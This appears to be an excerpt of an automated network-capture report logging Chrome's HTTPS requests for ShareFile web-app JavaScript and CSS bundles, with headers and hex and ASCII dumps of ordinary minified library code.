                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 73 6e 20 63 6f 6d 20 63 6f 6e 66 20 65 64 75 20 67 6f 76 20 69 64 20 6d 69 6c 20 6e 65 74 20 6f 72 67 20 22 2c 6c 79 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 69 64 20 6d 65 64 20 6e 65 74 20 6f 72 67 20 70 6c 63 20 73 63 68 20 22 2c 6d 61 3a 22 20 61 63 20 63 6f 20 67 6f 76 20 6d 20 6e 65 74 20 6f 72 67 20 70 72 65 73 73 20 22 2c 6d 63 3a 22 20 61 73 73 6f 20 74 6d 20 22 2c 6d 65 3a 22 20 61 63 20 63 6f 20 65 64 75 20 67 6f 76 20 69 74 73 20 6e 65 74 20 6f 72 67 20 70 72 69 76 20 22 2c 6d 67 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6d 69 6c 20 6e 6f 6d 20 6f 72 67 20 70 72 64 20 74 6d 20 22 2c 6d 6b 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 69 6e 66 20 6e 61 6d 65 20 6e 65 74 20 6f 72 67 20 70 72 6f 20 22 2c 6d 6c 3a 22 20 63 6f 6d 20 65 64 75
                                                                                                                                                                                                                      Data Ascii: sn com conf edu gov id mil net org ",ly:" com edu gov id med net org plc sch ",ma:" ac co gov m net org press ",mc:" asso tm ",me:" ac co edu gov its net org priv ",mg:" com edu gov mil nom org prd tm ",mk:" com edu gov inf name net org pro ",ml:" com edu
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 69 2e 68 61 73 51 75 65 72 79 28 65 2c 6f 2c 72 29 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 3b 63 61 73 65 22 4f 62 6a 65 63 74 22 3a 66 6f 72 28 76 61 72 20 73 20 69 6e 20 74 29 69 66 28 61 2e 63 61 6c 6c 28 74 2c 73 29 26 26 21 69 2e 68 61 73 51 75 65 72 79 28 65 2c 73 2c 74 5b 73 5d 29 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 55 52 49 2e 68 61 73 51 75 65 72 79 28 29 20 61 63 63 65 70 74 73 20 61 20 73 74 72 69 6e 67 2c 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6f 72 20 6f 62 6a 65 63 74 20 61 73 20 74 68 65 20 6e 61 6d 65 20 70 61 72 61 6d 65 74 65 72 22 29 7d 73 77 69 74 63 68 28
                                                                                                                                                                                                                      Data Ascii: =undefined||i.hasQuery(e,o,r)))return!0;return!1;case"Object":for(var s in t)if(a.call(t,s)&&!i.hasQuery(e,s,t[s]))return!1;return!0;default:throw new TypeError("URI.hasQuery() accepts a string, regular expression or object as the name parameter")}switch(
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 69 2e 64 65 63 6f 64 65 3d 75 6e 65 73 63 61 70 65 3b 74 72 79 7b 74 68 69 73 2e 6e 6f 72 6d 61 6c 69 7a 65 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 2e 65 6e 63 6f 64 65 3d 65 2c 69 2e 64 65 63 6f 64 65 3d 74 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 73 2e 72 65 61 64 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 63 6c 6f 6e 65 28 29 3b 74 2e 75 73 65 72 6e 61 6d 65 28 22 22 29 2e 70 61 73 73 77 6f 72 64 28 22 22 29 2e 6e 6f 72 6d 61 6c 69 7a 65 28 29 3b 76 61 72 20 72 3d 22 22 3b 69 66 28 74 2e 5f 70 61 72 74 73 2e 70 72 6f 74 6f 63 6f 6c 26 26 28 72 2b 3d 74 2e 5f 70 61 72 74 73 2e 70 72 6f 74 6f 63 6f 6c 2b 22 3a 2f 2f 22 29 2c 74 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 26 26 28 74 2e 69 73 28 22 70 75 6e 79 63 6f
                                                                                                                                                                                                                      Data Ascii: i.decode=unescape;try{this.normalize()}finally{i.encode=e,i.decode=t}return this},s.readable=function(){var t=this.clone();t.username("").password("").normalize();var r="";if(t._parts.protocol&&(r+=t._parts.protocol+"://"),t._parts.hostname&&(t.is("punyco


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      75192.168.2.174979413.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC604OUTGET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC589INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 98732
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 25 Sep 2024 15:09:00 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:16 GMT
                                                                                                                                                                                                                      ETag: "cdca5117242386d7cabb8c5cdee3f9a1"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 f5e34f7c59830a3caffb7df5f36b4dae.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: vZm7spov8FTqF7x4q02DnU8V30ie_s3B5KdpoaSE5q8-ucZveLOE9w==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 62 69 6c 6c 69 6e 67 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevbillingpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 2e 63 6f 6e 63 61 74 28 63 29 29 2c 28 52 7c 7c 43 29 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 26 26 28 76 3d 22 76 31 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 50 49 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 61 70 70 65 6e 64 4e 61 6d 65 73 70 61 63 65 54 6f 4d 69 73 73 69 6e 67 4b 65 79 3f 22 22 2e 63 6f 6e 63 61 74 28 66 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 63 29 3a 63 2c 43 3f 76 3a 76 6f 69 64 20 30 29 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 76 29 29 7d
                                                                                                                                                                                                                      Data Ascii: .concat(c)),(R||C)&&this.options.parseMissingKeyHandler&&(v="v1"!==this.options.compatibilityAPI?this.options.parseMissingKeyHandler(this.options.appendNamespaceToMissingKey?"".concat(f,":").concat(c):c,C?v:void 0):this.options.parseMissingKeyHandler(v))}
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 6d 61 78 52 65 70 6c 61 63 65 73 29 62 72 65 61 6b 7d 7d 29 29 2c 65 7d 7d 2c 7b 6b 65 79 3a 22 6e 65 73 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 3d 74 68 69 73 2c 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 7b 7d 2c 61 3d 59 28 7b 7d 2c 6f 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 6e 65 73 74 69 6e 67 4f 70 74 69 6f 6e 73 53 65 70 61 72 61 74 6f 72 3b 69 66 28 65 2e 69 6e 64 65 78 4f 66 28 6e 29 3c 30 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 72 3d 65 2e 73 70 6c 69 74 28 6e 65 77 20 52 65 67 45 78 70 28 22 22 2e 63 6f 6e 63 61 74
                                                                                                                                                                                                                      Data Ascii: maxReplaces)break}})),e}},{key:"nest",value:function(e,t){var n,r,i=this,o=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{},a=Y({},o);function s(e,t){var n=this.nestingOptionsSeparator;if(e.indexOf(n)<0)return e;var r=e.split(new RegExp("".concat
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC828INData Raw: 28 72 26 26 22 63 69 6d 6f 64 65 22 3d 3d 3d 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 72 65 74 75 72 6e 20 6e 28 29 3b 76 61 72 20 69 3d 5b 5d 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 74 2e 73 65 72 76 69 63 65 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 74 6f 52 65 73 6f 6c 76 65 48 69 65 72 61 72 63 68 79 28 65 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 69 6e 64 65 78 4f 66 28 65 29 3c 30 26 26 69 2e 70 75 73 68 28 65 29 7d 29 29 7d 3b 69 66 28 72 29 6f 28 72 29 3b 65 6c 73 65 20 74 68 69 73 2e 73 65 72 76 69 63 65 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 67 65 74 46 61 6c 6c 62 61 63 6b 43 6f 64 65 73 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 66 61 6c 6c 62 61 63 6b 4c 6e 67 29 2e 66 6f 72
                                                                                                                                                                                                                      Data Ascii: (r&&"cimode"===r.toLowerCase())return n();var i=[],o=function(e){e&&t.services.languageUtils.toResolveHierarchy(e).forEach((function(e){i.indexOf(e)<0&&i.push(e)}))};if(r)o(r);else this.services.languageUtils.getFallbackCodes(this.options.fallbackLng).for
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC14426INData Raw: 20 6f 62 6a 65 63 74 20 79 6f 75 20 61 72 65 20 70 61 73 73 69 6e 67 20 74 6f 20 69 31 38 6e 65 78 74 2e 75 73 65 28 29 22 29 3b 69 66 28 21 65 2e 74 79 70 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 59 6f 75 20 61 72 65 20 70 61 73 73 69 6e 67 20 61 20 77 72 6f 6e 67 20 6d 6f 64 75 6c 65 21 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 6f 62 6a 65 63 74 20 79 6f 75 20 61 72 65 20 70 61 73 73 69 6e 67 20 74 6f 20 69 31 38 6e 65 78 74 2e 75 73 65 28 29 22 29 3b 72 65 74 75 72 6e 22 62 61 63 6b 65 6e 64 22 3d 3d 3d 65 2e 74 79 70 65 26 26 28 74 68 69 73 2e 6d 6f 64 75 6c 65 73 2e 62 61 63 6b 65 6e 64 3d 65 29 2c 28 22 6c 6f 67 67 65 72 22 3d 3d 3d 65 2e 74 79 70 65 7c 7c 65 2e 6c 6f 67 26 26 65 2e 77 61 72 6e 26 26 65 2e 65 72 72 6f 72
                                                                                                                                                                                                                      Data Ascii: object you are passing to i18next.use()");if(!e.type)throw new Error("You are passing a wrong module! Please check the object you are passing to i18next.use()");return"backend"===e.type&&(this.modules.backend=e),("logger"===e.type||e.log&&e.warn&&e.error
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 6a 65 63 74 28 6e 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 69 2e 41 29 28 65 2c 74 2c 6e 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6e 29 29 3a 45 65 28 4f 62 6a 65 63 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 29 7d 72 65 74
                                                                                                                                                                                                                      Data Ascii: ject(n),!0).forEach((function(t){(0,i.A)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):Ee(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}ret
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 61 75 6c 74 3d 65 2e 65 78 70 6f 72 74 73 2c 74 28 6e 29 7d 65 2e 65 78 70 6f 72 74 73 3d 74 2c 65 2e 65 78 70 6f 72 74 73 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3d 21 30 2c 65 2e 65 78 70 6f 72 74 73 2e 64 65 66 61 75 6c 74 3d 65 2e 65 78 70 6f 72 74 73 7d 2c 34 37 35 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 72 3d 6e 28 34 36 33 33 29 28 29 3b 65 2e 65 78 70 6f 72 74 73 3d 72 3b 74 72 79 7b 72 65 67 65 6e 65 72 61 74 6f 72 52 75 6e 74 69 6d 65 3d 72 7d 63 61 74 63 68 28 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 72 65 67 65 6e 65 72 61 74 6f 72 52 75 6e 74 69 6d 65 3d 72 3a 46 75 6e 63 74 69 6f 6e 28 22 72 22 2c 22 72 65 67 65 6e 65 72 61 74 6f 72 52 75 6e 74 69 6d 65 20
                                                                                                                                                                                                                      Data Ascii: ault=e.exports,t(n)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports},4756:(e,t,n)=>{var r=n(4633)();e.exports=r;try{regeneratorRuntime=r}catch(e){"object"==typeof globalThis?globalThis.regeneratorRuntime=r:Function("r","regeneratorRuntime
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC1558INData Raw: 75 6c 6c 29 29 7d 29 29 2c 6e 2e 73 66 2e 72 65 67 69 73 74 65 72 4c 65 66 74 53 65 63 6f 6e 64 61 72 79 4e 61 76 43 68 69 6c 64 43 6f 6d 70 6f 6e 65 6e 74 28 7b 68 72 65 66 3a 4e 2e 70 32 2c 74 69 74 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 28 4f 2e 45 64 69 74 42 69 6c 6c 69 6e 67 49 6e 66 6f 29 7d 2c 77 65 69 67 68 74 3a 32 30 30 2c 70 61 72 65 6e 74 3a 4e 2e 43 69 7d 29 29 2c 74 28 72 2e 52 65 63 65 69 70 74 73 50 61 67 65 55 73 65 50 69 6c 65 74 2c 21 31 29 26 26 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3b 69 66 28 21 49 28 67 2e 42 69 6c 6c 69 6e 67 54 79 70 65 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 21 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 68 2e 52 6f 6c 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64
                                                                                                                                                                                                                      Data Ascii: ull))})),n.sf.registerLeftSecondaryNavChildComponent({href:N.p2,title:function(){return A(O.EditBillingInfo)},weight:200,parent:N.Ci})),t(r.ReceiptsPageUsePilet,!1)&&function(){var e,t;if(!I(g.BillingType))return!1;if(!(null===(e=h.Roles)||void 0===e?void


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      76192.168.2.174979613.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC576OUTGET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:23 GMT
                                                                                                                                                                                                                      Last-Modified: Mon, 26 Aug 2024 20:27:12 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 0f34c0d3b0e50b8875bcbb7d41684a58.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: y3yLzzywItYteCFxwJrnN_7fLf69UJ29ztPFQ1ajuA8ztgtKIWiwwA==
                                                                                                                                                                                                                      Age: 31251
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      77192.168.2.174979713.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC605OUTGET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 172013
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Thu, 03 Oct 2024 13:08:00 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:16 GMT
                                                                                                                                                                                                                      ETag: "1b4bef66080aa287b1d9e5454fb07741"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 697a26790d3ab8292d8546ca9be87bbc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 5vwNw7XZXNEPNCrDzetpJOfPUT4UKMqN2avXbjsk4yq5e8qFXEndRw==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 65 6e 61 6e 74 6d 67 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtenantmgtpilet,{})System.register(["react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e)
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 74 69 6f 6e 54 6f 6b 65 6e 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 46 69 6c 65 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 46 6f 6c 64 65 72 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 52 65 64 69 72 65 63 74 69 6f 6e 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                      Data Ascii: tionToken"===e["odata.type"]}function i(e){return e&&"ShareFile.Api.Models.File"===e["odata.type"]}function a(e){return e&&"ShareFile.Api.Models.Folder"===e["odata.type"]}function s(e){return e&&"ShareFile.Api.Models.Redirection"===e["odata.type"]}functio
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 72 28 34 38 36 37 29 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 69 73 53 74 61 6e 64 61 72 64 42 72 6f 77 73 65 72 45 6e 76 28 29 3f 7b 77 72 69 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6f 2c 69 2c 61 29 7b 76 61 72 20 73 3d 5b 5d 3b 73 2e 70 75 73 68 28 65 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 29 2c 6e 2e 69 73 4e 75 6d 62 65 72 28 72 29 26 26 73 2e 70 75 73 68 28 22 65 78 70 69 72 65 73 3d 22 2b 6e 65 77 20 44 61 74 65 28 72 29 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 29 2c 6e 2e 69 73 53 74 72 69 6e 67 28 6f 29 26 26 73 2e 70 75 73 68 28 22 70 61 74 68 3d 22 2b 6f 29 2c 6e 2e 69 73 53 74 72 69 6e 67 28 69 29 26 26 73 2e 70 75 73 68 28
                                                                                                                                                                                                                      Data Ascii: )=>{"use strict";var n=r(4867);e.exports=n.isStandardBrowserEnv()?{write:function(e,t,r,o,i,a){var s=[];s.push(e+"="+encodeURIComponent(t)),n.isNumber(r)&&s.push("expires="+new Date(r).toGMTString()),n.isString(o)&&s.push("path="+o),n.isString(i)&&s.push(
